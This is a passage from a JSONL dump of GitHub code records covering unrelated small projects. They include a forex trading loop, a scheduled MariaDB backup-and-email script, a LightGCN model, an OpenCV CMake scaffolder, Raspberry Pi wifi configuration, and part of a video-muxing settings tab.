TrailOnErrorDecision\n\ndisplay = True\n\n\nclass TradingExpert(Expert):\n\n def after_init(self):\n self.abilities.append(TrailOnErrorDecision())\n\n\ntradingExpert = TradingExpert(strike_step=3)\n\npair_name = \"EURUSD\"\ninterval = \"1.mini\"\n\ndirname = os.path.dirname(__file__)\nbase_path = dirname + \"\"\n\ndf_csv = get_data_chunk(pair_name, interval, 2048)\n\nrisk_factor = 0.0002\n\n\ndef calculate_certainty(diff):\n certainty = 0.0\n decision_val = abs(diff) / risk_factor\n # print(decision_val)\n if decision_val >= 3:\n certainty = 1\n elif decision_val >= 2:\n certainty = 0.8\n elif decision_val >= 1:\n certainty = 0.6\n else:\n certainty = 0.4\n\n return certainty\n\n\ndef calculate_result(__states):\n # print(states)\n f_step = __states[:1, 4:5] # using close value\n l_step = __states[-1:, 4:5] # using close value\n\n diff = f_step - l_step\n if diff == 0:\n certainty = 1\n action_type = TradeAction.STAY\n else:\n certainty = calculate_certainty(diff)\n if diff > 0:\n action_type = TradeAction.SELL\n else:\n action_type = TradeAction.BUY\n\n __action = Action.action_gen(action_type, certainty)\n\n # print(f_step, l_step, diff, diff > 0, calculate_certainty(diff))\n # print(__action)\n 
# time.sleep(0.5)\n\n return __action\n\n\nif __name__ == '__main__':\n print(\"Expert working\")\n last_result = -1\n\n for df in df_csv:\n step_count = 0\n\n next_strike = 0\n states = []\n print(df.head())\n print(tradingExpert.status())\n\n for df_row in df.values:\n df_values = df_row\n\n states.append(df_values)\n\n if step_count == next_strike:\n states = np.array(states)\n result = calculate_result(states)\n\n # tradingExpert.feedback(result=result, state=states)\n action, strike_on = tradingExpert.interact(states, result)\n\n next_strike = step_count + strike_on\n act_state = df_values\n next_action = action\n ## States after action taken\n states = []\n # states.append(df_values)\n\n step_count += 1\n if display:\n time.sleep(0.2)\n","repo_name":"ceylon-ai-projects/expertsystem","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"40561379181","text":"# coding:utf-8\nimport os\nimport time\nimport datetime\nimport sched\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.header import Header\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.application import MIMEApplication\n# 第一个参数确定任务的时间,返回从某个特定的时间到现在经历的秒数\n# 第二个参数以某种人为的方式衡量时间\nschedule = sched.scheduler(time.time, time.sleep)\n\n\ndef backupsDB():\n # 如果是linux改下路径就可以了\n today = str(datetime.date.today())\n cmdString = 'D:/MariaDB/bin/mysqldump -u root --password=root --databases vip > d:/test_backup/vip_'+today+'.sql'\n # print('cmdStr:%s' %cmdString)\n os.system(cmdString)\n\n\ndef sendMail():\n _user = \"\" # 发送者的邮箱\n _pwd = \"\" # 邮箱授权码\n _to = \"\" # 接收者的邮箱\n # 如名字所示Multipart就是分多个部分\n msg = MIMEMultipart()\n msg[\"Subject\"] = \"数据库备份\"\n msg[\"From\"] = _user\n msg[\"To\"] = _to\n # ---这是文字部分---\n part = MIMEText(\"数据库备份\")\n msg.attach(part)\n # ---这是附件部分---\n # 类型附件\n part = MIMEApplication(open('D:/test_backup/vip.sql', 'rb').read())\n part.add_header('Content-Disposition', 'attachment',\n filename=\"abc_backup.sql\")\n msg.attach(part)\n s = smtplib.SMTP(\"smtp.qq.com\", timeout=30) # 连接QQ邮件服务器,端口默认是25\n s.login(_user, _pwd) # 登陆服务器\n s.sendmail(_user, _to, msg.as_string()) # 发送邮件\n s.close()\n\n\ndef perform_command(cmd, inc):\n # 安排inc秒后再次运行自己,即周期运行\n schedule.enter(inc, 0, perform_command, (cmd, inc))\n os.system(cmd)\n backupsDB()\n sendMail()\n\n\ndef timming_exe(cmd, inc=60):\n # enter用来安排某事件的发生时间,从现在起第n秒开始启动\n schedule.enter(inc, 0, perform_command, (cmd, inc))\n # 持续运行,直到计划时间队列变成空为止\n schedule.run()\n\n\nif __name__ == '__main__':\n print(\"show time after 10 seconds:\")\n timming_exe(\"echo %time%\", 112800) # 每间隔56400秒备份发送邮件\n # perform_command(\"echo %time%\", 10)\n # 46400 基本上是半天\n","repo_name":"hey-xuc/python-","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"13287022715","text":"import numpy as np\nimport scipy.sparse as sp\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport sys\n\nimport utils\n\n\nclass Light_GCN(nn.Module):\n def __init__(self, hyper_parameter_dict, args, user_le, item_le, train_df, device, graph):\n super(Light_GCN, self).__init__()\n self.args = args\n\n self.n_user = len(user_le.classes_)\n self.n_item = len(item_le.classes_)\n\n self.user_le = user_le\n self.item_le = item_le\n self.train_df = train_df\n\n self.device = device\n\n 
self.embed_size = hyper_parameter_dict['model']['embed_size']\n self.num_layers = hyper_parameter_dict['model']['num_layers']\n self.num_folds = hyper_parameter_dict['model']['num_folds']\n self.node_dropout = hyper_parameter_dict['model']['node_dropout']\n\n self.split = args['model']['split']\n\n self.Graph = graph\n\n self.build_graph()\n\n def build_graph(self):\n self.user_embedding = nn.Embedding(self.n_user, self.embed_size)\n self.item_embedding = nn.Embedding(self.n_item, self.embed_size)\n\n nn.init.normal_(self.user_embedding.weight, 0, 0.01)\n nn.init.normal_(self.item_embedding.weight, 0, 0.01)\n\n self.to(self.device)\n\n def lightgcn_embedding(self, graph):\n users_emb = self.user_embedding.weight\n items_emb = self.item_embedding.weight\n all_emb = torch.cat([users_emb, items_emb], dim=0)\n\n embs = [all_emb]\n\n g_droped = graph\n\n ego_emb = all_emb\n for k in range(self.num_layers):\n if self.split:\n tmp_emb = []\n for f in range(len(g_droped)):\n tmp_emb.append(torch.sparse.mm(g_droped[f], ego_emb))\n side_emb = torch.cat(tmp_emb, dim=0)\n all_emb = side_emb\n\n else:\n all_emb = torch.sparse.mm(g_droped, all_emb)\n embs.append(all_emb)\n\n embs = torch.stack(embs, dim=1)\n lightgcn_out = torch.mean(embs, dim=1)\n users, items = torch.split(lightgcn_out, [self.n_user, self.n_item])\n\n return users, items\n\n # def make_train_matrix(self, train_df, args):\n # rows, cols = train_df[args['data']['columns']\n # [0]], train_df[args['data']['columns'][1]]\n # values = train_df[args['data']['columns'][2]]\n\n # sp_data = sp.csr_matrix(\n # (values, (rows, cols)), dtype='float64', shape=(self.n_user, self.n_item))\n # self.train_matrix = sp_data\n\n # def _split_A_hat(self, A):\n # A_fold = []\n # fold_len = (self.n_user + self.n_item) // self.num_folds\n\n # for i_fold in range(self.num_folds):\n # start = i_fold * fold_len\n # if i_fold == self.num_folds - 1:\n # end = self.n_user + self.n_item\n # else:\n # end = (i_fold + 1) * fold_len\n # A_fold.append(self._convert_sp_mat_to_sp_tensor(\n # A[start:end]).coalesce().to(self.device))\n\n # return A_fold\n\n # def _convert_sp_mat_to_sp_tensor(self, X):\n # coo = X.tocoo().astype(np.float32)\n # row = torch.Tensor(coo.row).long()\n # col = torch.Tensor(coo.col).long()\n # index = torch.stack([row, col])\n # data = torch.FloatTensor(coo.data)\n # return torch.sparse.FloatTensor(index, data, torch.Size(coo.shape))\n\n # def getSparseGraph(self):\n # n_users, n_items = self.train_matrix.shape\n\n # adj_mat = sp.dok_matrix(\n # (n_users + n_items, n_users + n_items), dtype=np.float32)\n # adj_mat = adj_mat.tolil()\n\n # R = self.train_matrix.tolil()\n\n # adj_mat[:n_users, n_users:] = R\n # adj_mat[n_users:, :n_users] = R.T\n # adj_mat = adj_mat.todok()\n\n # rowsum = np.array(adj_mat.sum(axis=1))\n # d_inv = np.power(rowsum, -0.5).flatten()\n # d_inv[np.isinf(d_inv)] = 0.\n # d_mat = sp.diags(d_inv)\n\n # norm_adj = d_mat.dot(adj_mat)\n # norm_adj = norm_adj.dot(d_mat)\n # norm_adj = norm_adj.tocsr()\n\n # if self.split == True:\n # Graph = self._split_A_hat(norm_adj)\n\n # else:\n # Graph = self._convert_sp_mat_to_sp_tensor(norm_adj)\n # Graph = Graph.coalesce().to(self.device)\n\n # return Graph\n\n def predict_batch_users(self, user_ids):\n user_embeddings = F.embedding(user_ids, self.user_embedding_pred)\n item_embeddings = self.item_Embedding_pred\n return np.matmul(user_embeddings, item_embeddings.T)\n\n def foward(self, user, item):\n u_embedding, i_embedding = self.lightgcn_embedding(self.Graph)\n\n user_latent = 
F.embedding(user, u_embedding)\n item_latent = F.embedding(item, i_embedding)\n\n score = torch.mul(user_latent, item_latent).sum(1)\n\n return score\n","repo_name":"yswSlamDunk/Recommendation-System","sub_path":"Graph/3.Light_GCN_bookcrossing/model/model_Light_GCN.py","file_name":"model_Light_GCN.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
+{"seq_id":"28976280936","text":"#! /home/oberon/anaconda3/bin/python\nfrom termcolor import colored\n\n\ndef get_args():\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'project',\n nargs='+',\n type=str,\n help='Project name you want to create'\n )\n\n args = parser.parse_args()\n return args.project\n\n\ndef mk_structure(name):\n import os\n\n structure = {\n 'root' : name,\n 'build': os.path.join(name, 'build')\n }\n\n for directory in structure.values():\n if not os.path.exists(directory):\n try:\n os.makedirs(directory)\n except OSError as e:\n print(e)\n return False\n\n return True\n\n\ndef mk_sample(name):\n import os.path\n\n sample_path = os.path.join(name, name + '.cpp')\n\n sample = {\n 'copyright':\n '// Copyright 2019 SnesarevMS\\n' +\n '\\n',\n\n 'includes' :\n '#include \"opencv2/opencv.hpp\"\\n' +\n '#include \"opencv2/highgui/highgui.hpp\"\\n' +\n '\\n',\n\n 'namespace':\n 'using namespace cv;\\n' +\n '\\n',\n\n 'main':\n 'int main(int argc, char** argv) {\\n' +\n ' // create a gui window:\\n' +\n ' namedWindow(\"Output\", 1);\\n' +\n '\\n' +\n ' // wait for the user to press any key:\\n' +\n ' waitKey(0);\\n' +\n '\\n' +\n ' return 0;\\n' +\n '}' +\n '\\n'\n }\n\n try:\n with open(sample_path, 'w+') as file:\n for part in sample.values():\n file.write(part)\n except EnvironmentError:\n return False\n\n return True\n\n\ndef mk_cmake(name):\n import os.path\n\n cmake_path = os.path.join(name, 'CMakeLists.txt')\n\n cmake = {\n 'version':\n 'cmake_minimum_required(VERSION 3.13)\\n' +\n '\\n',\n\n 'project':\n 'project(' + name + ')\\n' +\n '\\n',\n\n 'opencv':\n 'find_package(OpenCV REQUIRED)\\n' +\n '\\n'\n 'message(\"opencv version: \" ${OpenCV_VERSION})\\n' +\n '\\n'\n 'include_directories(${OpenCV_INCLUDE_DIRS})\\n' +\n '\\n',\n\n 'executable': 'add_executable(' + name + '.o ' + name + '.cpp)\\n' +\n '\\n',\n\n 'links':\n 'target_link_libraries(' + name + '.o ${OpenCV_LIBS})\\n' +\n '\\n',\n\n 'run':\n 'add_custom_target(run\\n' +\n ' COMMAND ' + name + '.o\\n' +\n ' DEPENDS ' + name + '.o\\n' +\n ' WORKING_DIRECTORY ${CMAKE_PROJECT_DIR}\\n' +\n ')' +\n '\\n',\n }\n\n try:\n with open(cmake_path, 'w+') as file:\n for part in cmake.values():\n file.write(part)\n except EnvironmentError:\n return False\n\n return True\n\n\ndef call_run(project):\n import subprocess\n\n return subprocess.call(['./run ' + project], shell=True)\n\n\ndef main():\n steps = {\n 0: {\n 'Function' : mk_structure,\n 'Description': ' Preparing project ' + colored('structure', color='yellow') + '...'\n },\n 1: {\n 'Function' : mk_sample,\n 'Description': ' Generating ' + colored('template', color='yellow') + '...'\n },\n 2: {\n 'Function' : mk_cmake,\n 'Description': ' Generating ' + colored('CMakeLists.txt', color='yellow') + ' file' + '...'\n }\n }\n\n projects = get_args()\n\n for project in projects:\n print()\n print(' Setting up ' + colored(project, color='yellow') + '...')\n print()\n\n for step in steps.values():\n out = step['Description']\n wait = ((50 - len(out)) * \" \" + \"[\" + colored(\" WAIT \", 'yellow') + \"]\\n\")\n ok = ((50 - len(out)) * \" \" + \"[\" + colored(\" OK \", 'green') + \"]\\n\")\n fail = ((50 - len(out)) * \" \" + \"[\" + colored(\" FAILED \", 'red') + \"]\\n\")\n\n print(out, end=wait)\n if step['Function'](project):\n print(out, end=ok)\n print()\n else:\n print(out, end=fail)\n print()\n break\n\n call_run(projects[len(projects) - 1])\n\n return\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"maxim1317/opencv-lab","sub_path":"scripts/new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
+{"seq_id":"16331865922","text":"\"\"\"Control the wifi connections of the device.\"\"\"\r\nimport logging\r\nimport subprocess\r\nfrom typing import List, Optional\r\n\r\nimport netifaces\r\nfrom sqlalchemy.orm.exc import NoResultFound\r\nfrom sqlalchemy.orm.session import object_session\r\n\r\nfrom fd_device.database.base import get_session\r\nfrom fd_device.database.system import Interface, Wifi\r\nfrom fd_device.network.ethernet import get_external_interface, get_interfaces\r\nfrom fd_device.network.network_files import (\r\n dhcpcd_file,\r\n dnsmasq_file,\r\n hostapd_file,\r\n interface_file,\r\n iptables_file,\r\n wpa_supplicant_file,\r\n)\r\nfrom fd_device.settings import get_config\r\n\r\nlogger = logging.getLogger(\"fd.network.wifi\")\r\n\r\n\r\ndef refresh_interfaces():\r\n \"\"\"Refresh all interfaces. Update with current information.\"\"\"\r\n\r\n session = get_session()\r\n ap_present = False\r\n\r\n interfaces = get_interfaces()\r\n\r\n # update all interfaces.active to be False by default\r\n session.query(Interface).update({Interface.is_active: False})\r\n\r\n for my_interface in interfaces:\r\n try:\r\n interface = session.query(Interface).filter_by(interface=my_interface).one()\r\n\r\n interface.is_active = True\r\n # see if there is an interface that is configured for an ap\r\n if interface.state == \"ap\":\r\n ap_present = True\r\n\r\n # must be a new interface so lets add it\r\n except NoResultFound:\r\n new_interface = Interface(my_interface)\r\n new_interface.is_active = True\r\n new_interface.is_for_fm = False\r\n new_interface.state = \"dhcp\"\r\n session.add(new_interface)\r\n\r\n session.commit()\r\n session.close()\r\n\r\n if ap_present:\r\n set_ap_mode()\r\n else:\r\n set_wpa_mode()\r\n\r\n\r\ndef scan_wifi(interface=None) -> List:\r\n \"\"\"Scan the interface for the available wifi networks.\r\n\r\n Args:\r\n interface (str, optional): the interface to search on. 
Defaults to None.\r\n if no interface is given, try an interface from the database that is 'dhcp'\r\n\r\n Returns:\r\n List: A list of strings that are the found networks\r\n \"\"\"\r\n\r\n # if no interface is given, try find an interface in the database\r\n # that has the state set to 'dhcp' and is not 'eth'\r\n if interface is None:\r\n session = get_session()\r\n\r\n interfaces = session.query(Interface).all()\r\n for x in interfaces:\r\n if not x.interface.startswith(\"eth\"):\r\n if x.state == \"dhcp\":\r\n interface = x.interface\r\n\r\n session.close()\r\n\r\n # exit if still no interface\r\n if interface is None:\r\n logger.warning(\"No interface available to scan wifi networks\")\r\n return []\r\n\r\n # scan the interface for networks\r\n command = [\"sudo\", \"iwlist\", interface, \"scan\"]\r\n output = subprocess.check_output(command, universal_newlines=True)\r\n index = output.find('ESSID:\"')\r\n ssid = []\r\n while index > 0:\r\n stop = output.find('\"\\n', index)\r\n\r\n ssid.append(output[index + 7 : stop])\r\n\r\n output = output[stop + 2 :]\r\n\r\n index = output.find('ESSID:\"')\r\n\r\n return ssid\r\n\r\n\r\ndef add_wifi_network(\r\n wifi_name: str, wifi_password: str, interface: Interface = None\r\n) -> Optional[Wifi]:\r\n \"\"\"Add a wifi entry to the database of stored WiFi networks.\r\n\r\n Args:\r\n wifi_name (str): The SSID of the WiFi network.\r\n wifi_password (str): The password of the WiFi network.\r\n interface (Interface, optional): The Interface to assign the WiFi to.\r\n If Noine, the first 'wlan' interface set to DHCP is used. Defaults to None.\r\n\r\n Returns:\r\n Optional[Wifi]: The WiFi instance that was created or None if no Interface is found.\r\n \"\"\"\r\n\r\n # if no interface is passed in, create a session and look for a valid interface\r\n if interface is None:\r\n session = get_session()\r\n interfaces = session.query(Interface).all()\r\n for x in interfaces:\r\n # find first available wlan interface that is not dhcp\r\n if x.interface != \"eth0\" and x.state == \"dhcp\":\r\n interface = x\r\n break\r\n # if an interface is passed in, get the session from the interface.\r\n else:\r\n session = object_session(interface)\r\n\r\n if interface is None:\r\n logger.error(\"No interface available to add new wifi network\")\r\n return None\r\n\r\n # have an interface. now create a Wifi entry\r\n new_wifi = Wifi()\r\n new_wifi.name = wifi_name\r\n new_wifi.password = wifi_password\r\n new_wifi.mode = \"dhcp\"\r\n new_wifi.interface = interface\r\n\r\n new_wifi.save(session)\r\n\r\n return new_wifi\r\n\r\n\r\ndef delete_wifi_network(wifi_id: str) -> bool:\r\n \"\"\"Delete a WiFi network.\r\n\r\n Args:\r\n wifi_id (str): The ID of the WiFi netowrk to delete\r\n\r\n Returns:\r\n bool: True if an entry was deleted. False if nothing was deleted.\r\n \"\"\"\r\n\r\n session = get_session()\r\n\r\n deleted_count = session.query(Wifi).filter_by(id=wifi_id).delete()\r\n session.commit()\r\n session.close()\r\n\r\n return bool(deleted_count > 0)\r\n\r\n\r\ndef wifi_info() -> List:\r\n \"\"\"Get a list of WiFi details for all wlan interfaces.\r\n\r\n Returns:\r\n List: For each interface, a dictionary of details is added to the list\r\n Keys of the dictionary are:\r\n interface: the interface\r\n if ap:\r\n clients: the number of clients currently connected\r\n ssid: the ssid of the ap\r\n password: the password of the ap\r\n if dhcp:\r\n state: either the SSID currently connected to or False\r\n state_boolean: boolean value for state. 
True or False\r\n if state:\r\n address: the IPV4 address\r\n ssid: the ssid of the dhcp interface\r\n password: the password of the dhcp interface\r\n \"\"\"\r\n logger.debug(\"getting wifi information\")\r\n\r\n wlan_interfaces = get_interfaces(keep_eth=False)\r\n\r\n wifi = []\r\n\r\n session = get_session()\r\n\r\n for w_interface in wlan_interfaces:\r\n try:\r\n info = {}\r\n interface = session.query(Interface).filter_by(interface=w_interface).one()\r\n info[\"interface\"] = interface\r\n if interface.state == \"ap\":\r\n info[\"clients\"] = wifi_ap_clients(interface.interface)\r\n info[\"ssid\"] = interface.credentials[0].name\r\n info[\"password\"] = interface.credentials[0].password\r\n else:\r\n info[\"state\"] = wifi_dhcp_info(interface.interface)\r\n if info[\"state\"] is False:\r\n info[\"state_boolean\"] = False\r\n else:\r\n info[\"state_boolean\"] = True\r\n if w_interface in netifaces.interfaces():\r\n address = netifaces.ifaddresses(w_interface)\r\n info[\"address\"] = address[netifaces.AF_INET][0][\"addr\"]\r\n\r\n if interface.credentials:\r\n info[\"ssid\"] = interface.credentials[0].name\r\n info[\"password\"] = interface.credentials[0].password\r\n\r\n wifi.append(info)\r\n\r\n except NoResultFound:\r\n pass\r\n\r\n session.close()\r\n return wifi\r\n\r\n\r\ndef wifi_ap_clients(interface: str) -> int:\r\n \"\"\"Get the list of ap clients an interface has.\r\n\r\n Args:\r\n interface (str): The interface to get the details for.\r\n\r\n Returns:\r\n int: The number of clients connected to the interface.\r\n \"\"\"\r\n\r\n logger.debug(\"getting wifi clients\")\r\n command = [\"iw\", \"dev\", interface, \"station\", \"dump\"]\r\n client_info = subprocess.check_output(command, universal_newlines=True)\r\n\r\n client_count = client_info.count(\"Station\")\r\n\r\n return client_count\r\n\r\n\r\ndef wifi_dhcp_info(interface: str) -> str:\r\n \"\"\"Return the SSID that is connected for a given interface.\r\n\r\n Args:\r\n interface (str): The interface to check. eg. 
'wlan0'\r\n\r\n Returns:\r\n str: The SSID for the interface, or 'Not connected' if the interface is not connected.\r\n \"\"\"\r\n\r\n command = [\"iw\", interface, \"link\"]\r\n output = subprocess.check_output(command, universal_newlines=True)\r\n\r\n if output.startswith(\"Not connected.\"):\r\n return \"Not connected\"\r\n\r\n start_index = output.find(\"SSID: \")\r\n end_index = output.find(\"\\n\", start_index)\r\n ssid = output[start_index + 6 : end_index]\r\n\r\n return ssid\r\n\r\n\r\ndef set_interfaces(interfaces: List):\r\n \"\"\"Set interface information into database and configure hardware accordingly.\r\n\r\n Args:\r\n interfaces (List): A list of dictionaries with the required information.\r\n \"\"\"\r\n\r\n session = get_session()\r\n wifi_ap_present = False\r\n\r\n for interface in interfaces:\r\n try:\r\n db_result = (\r\n session.query(Interface).filter_by(interface=interface[\"name\"]).one()\r\n )\r\n except NoResultFound:\r\n db_result = Interface(interface[\"name\"])\r\n session.add(db_result)\r\n db_result.is_active = True\r\n db_result.is_for_fm = interface[\"is_for_fm\"]\r\n db_result.state = interface[\"state\"]\r\n if interface[\"state\"] == \"ap\":\r\n wifi_ap_present = True\r\n if \"creds\" in interface:\r\n add_wifi_network(\r\n wifi_name=interface[\"creds\"][\"ssid\"],\r\n wifi_password=interface[\"creds\"][\"password\"],\r\n interface=db_result,\r\n )\r\n session.commit()\r\n\r\n if wifi_ap_present:\r\n set_ap_mode()\r\n else:\r\n set_wpa_mode()\r\n\r\n\r\ndef set_ap_mode():\r\n \"\"\"Perform the setup and intialization work for interfaces with an ap present.\"\"\"\r\n\r\n logger.debug(\"setting wifi into ap mode\")\r\n session = get_session()\r\n\r\n # get the wlan0 and wlan1 dhcp states\r\n try:\r\n ap_interface = session.query(Interface).filter_by(state=\"ap\").first()\r\n ap_ssid = ap_interface.credentials[0].name\r\n ap_password = ap_interface.credentials[0].password\r\n\r\n except NoResultFound:\r\n # error. abort\r\n logger.warning(\"No interface with state set to 'ap'. 
Aborting\")\r\n return\r\n\r\n # get info for interface file\r\n if ap_interface.interface == \"wlan0\":\r\n wlan0_dhcp = False\r\n wlan1_dhcp = True\r\n\r\n else:\r\n wlan0_dhcp = True\r\n wlan1_dhcp = False\r\n\r\n # get the info for the wpa_supplicant file\r\n wifi_defs = session.query(Wifi).filter(Wifi.mode != \"ap\").all()\r\n networks = []\r\n for wifi in wifi_defs:\r\n new_network = {}\r\n new_network[\"ssid\"] = wifi.name\r\n new_network[\"password\"] = wifi.password\r\n networks.append(new_network)\r\n\r\n # get the information for the iptables_file\r\n internal_interface = ap_interface.interface\r\n external_interface = get_external_interface()\r\n\r\n iptables_file(external_interface, internal_interface)\r\n interface_file(wlan0_dhcp=wlan0_dhcp, wlan1_dhcp=wlan1_dhcp)\r\n wpa_supplicant_file(networks)\r\n dhcpcd_file(interface=ap_interface.interface)\r\n dnsmasq_file(interface=ap_interface.interface)\r\n hostapd_file(ap_interface.interface, ap_ssid, ap_password)\r\n\r\n config = get_config()\r\n\r\n path = config.APP_DIR + \"/network/ap_script.sh\"\r\n\r\n command = [\"sudo\", \"sh\", path, ap_interface.interface]\r\n subprocess.check_call(command)\r\n\r\n session.close()\r\n\r\n\r\ndef set_wpa_mode():\r\n \"\"\"Perform the setup and intialization work for interfaces with no ap present.\"\"\"\r\n\r\n logger.debug(\"setting all wlan into wpa mode\")\r\n session = get_session()\r\n\r\n # get the info for the wpa_supplicant file\r\n wifi_defs = session.query(Wifi).filter(Wifi.mode != \"ap\").all()\r\n networks = []\r\n for wifi in wifi_defs:\r\n new_network = {}\r\n new_network[\"ssid\"] = wifi.name\r\n new_network[\"password\"] = wifi.password\r\n networks.append(new_network)\r\n\r\n iptables_file(None, None, flush_only=True)\r\n interface_file()\r\n wpa_supplicant_file(networks)\r\n dhcpcd_file()\r\n\r\n config = get_config()\r\n path = config.APP_DIR + \"/network/wpa_script.sh\"\r\n\r\n command = [\"sudo\", \"sh\", path]\r\n subprocess.check_call(command)\r\n session.close()\r\n","repo_name":"nstoik/farm_device","sub_path":"device/fd_device/network/wifi.py","file_name":"wifi.py","file_ext":"py","file_size_in_byte":12365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"9439676966","text":"import tweepy\nfrom classes.user import User\nfrom config.credentials import API_KEY, API_SECRET, API_TOKEN, API_TOKEN_SECRET, account_name\n\naccount_name = 'Madokera' #Account Name\n\ndef setup(name):\n auth = tweepy.OAuthHandler(API_KEY, API_SECRET)\n auth.set_access_token(API_TOKEN, API_TOKEN_SECRET)\n api = tweepy.API(auth)\n user = User(name, api)\n return api, user\n","repo_name":"lumini23/twitter-morse-tweet-translator","sub_path":"config/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"34985323912","text":"d = int(input('d: '))\nm = int(input('m: '))\ny = int(input('y: '))\n\nday_in_month = ['',31,28,31,30,31,30,31,31,30,31,30,31] \ndate = 0\n\ndef leap_year(y) :\n if (y % 4 == 0 and y % 100 != 0) or (y % 400 == 0):\n return True\n else:\n return False\n\nif leap_year(y) == True :\n day_in_month[2] = 29\n\nfor i in range(1,m) :\n date += day_in_month[i]\n\ndate = date + 
d\n\nprint(date)\n\n","repo_name":"Paradorn-248/Computer-Programming","sub_path":"lecture01/part2/date.py","file_name":"date.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"40041378043","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n num1_list = []\n num2_list = []\n\n # Put numbers into stack\n while l1:\n num1_list.append(l1.val)\n l1 = l1.next\n\n while l2:\n num2_list.append(l2.val)\n l2 = l2.next\n\n # Reverse numbers\n num1_list = num1_list[::-1]\n num2_list = num2_list[::-1]\n\n # Create numbers\n num1_str = ''.join(map(str, num1_list))\n num2_str = ''.join(map(str, num2_list))\n num1 = int(num1_str)\n num2 = int(num2_str)\n\n # Add numbers\n num3 = num1 + num2\n\n # Parse result to list\n num3_list = []\n for digit_str in str(num3):\n num3_list.append(int(digit_str))\n \n # Reverse result\n num3_list = num3_list[::-1]\n\n # Create linked list\n result = ListNode()\n cur = result\n for num in num3_list:\n cur.next = ListNode(num)\n cur = cur.next\n\n return result.next","repo_name":"sntnmjones/Leetcode","sub_path":"Problems/AddTwoNumbers/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"12883024922","text":"import os\nimport time\nfrom os import makedirs\nfrom pathlib import Path\nfrom shutil import copy2\n\nfrom PySide2.QtCore import Signal\nfrom PySide2.QtGui import QPaintEvent, QResizeEvent\nfrom PySide2.QtWidgets import (\n QVBoxLayout,\n QGroupBox,\n QFileDialog, QCheckBox, QLineEdit, QSizePolicy, QWidget, QCompleter, )\n\nfrom packages.Startup.DefaultOptions import DefaultOptions\nfrom packages.Startup.PreDefined import AllSubtitlesTracks\nfrom packages.Tabs.GlobalSetting import GlobalSetting, get_file_name_absolute_path, write_to_log_file\nfrom packages.Tabs.MuxSetting.Widgets.AudioTracksCheckableComboBox import AudioTracksCheckableComboBox\nfrom packages.Tabs.MuxSetting.Widgets.ControlQueueButton import ControlQueueButton\nfrom packages.Tabs.MuxSetting.Widgets.JobQueueLayout import JobQueueLayout\nfrom packages.Tabs.MuxSetting.Widgets.MakeThisAudioDefaultCheckBox import MakeThisAudioDefaultCheckBox\nfrom packages.Tabs.MuxSetting.Widgets.MakeThisSubtitleDefaultCheckBox import MakeThisSubtitleDefaultCheckBox\nfrom packages.Tabs.MuxSetting.Widgets.MakeThisTrackDefaultComboBox import MakeThisTrackDefaultComboBox\nfrom packages.Tabs.MuxSetting.Widgets.OnlyKeepThoseAudiosCheckBox import OnlyKeepThoseAudiosCheckBox\nfrom packages.Tabs.MuxSetting.Widgets.OnlyKeepThoseSubtitlesCheckBox import OnlyKeepThoseSubtitlesCheckBox\nfrom packages.Tabs.MuxSetting.Widgets.SubtitleTracksCheckableComboBox import SubtitleTracksCheckableComboBox\nfrom packages.Widgets.ErrorMuxingDialog import ErrorMuxingDialog\nfrom packages.Widgets.FileNotFoundDialog import FileNotFoundDialog\nfrom packages.Widgets.InfoDialog import InfoDialog\nfrom packages.Widgets.InvalidPathDialog import *\n\n\n# noinspection PyAttributeOutsideInit\n\n\ndef get_time():\n t = time.time()\n return str(time.strftime('%Y_%m_%d_%H_%M_%S', time.localtime(t)))\n\n\ndef change_global_LogFilePath():\n t = get_time()\n log_file_name = \"muxing_log_file_\" + t + \".txt\"\n 
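    # the timestamp baked into the file name (e.g. muxing_log_file_2024_01_31_13_45_00.txt)\n    # gives every muxing run its own log, so starting a new queue never overwrites the log of an earlier run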
GlobalFiles.MuxingLogFilePath = get_file_name_absolute_path(file_name=log_file_name,\n folder_path=GlobalFiles.MergeLogsFolderPath)\n\n\ndef check_is_there_subtitle_to_mux():\n for i in GlobalSetting.SUBTITLE_FILES_LIST.keys():\n if len(GlobalSetting.SUBTITLE_FILES_LIST[i]) > 0:\n return True\n return False\n\n\ndef check_is_there_audio_to_mux():\n for i in GlobalSetting.AUDIO_FILES_LIST.keys():\n if len(GlobalSetting.AUDIO_FILES_LIST[i]) > 0:\n return True\n return False\n\n\n# noinspection PyAttributeOutsideInit\ndef check_if_at_least_one_muxing_setting_has_been_selected():\n if check_is_there_subtitle_to_mux() or \\\n check_is_there_audio_to_mux() or \\\n len(GlobalSetting.ATTACHMENT_FILES_LIST) > 0 or \\\n len(GlobalSetting.CHAPTER_FILES_LIST) > 0 or \\\n GlobalSetting.CHAPTER_DISCARD_OLD or \\\n GlobalSetting.ATTACHMENT_DISCARD_OLD or \\\n GlobalSetting.MUX_SETTING_ONLY_KEEP_THOSE_SUBTITLES_ENABLED or \\\n GlobalSetting.MUX_SETTING_ONLY_KEEP_THOSE_AUDIOS_ENABLED or \\\n 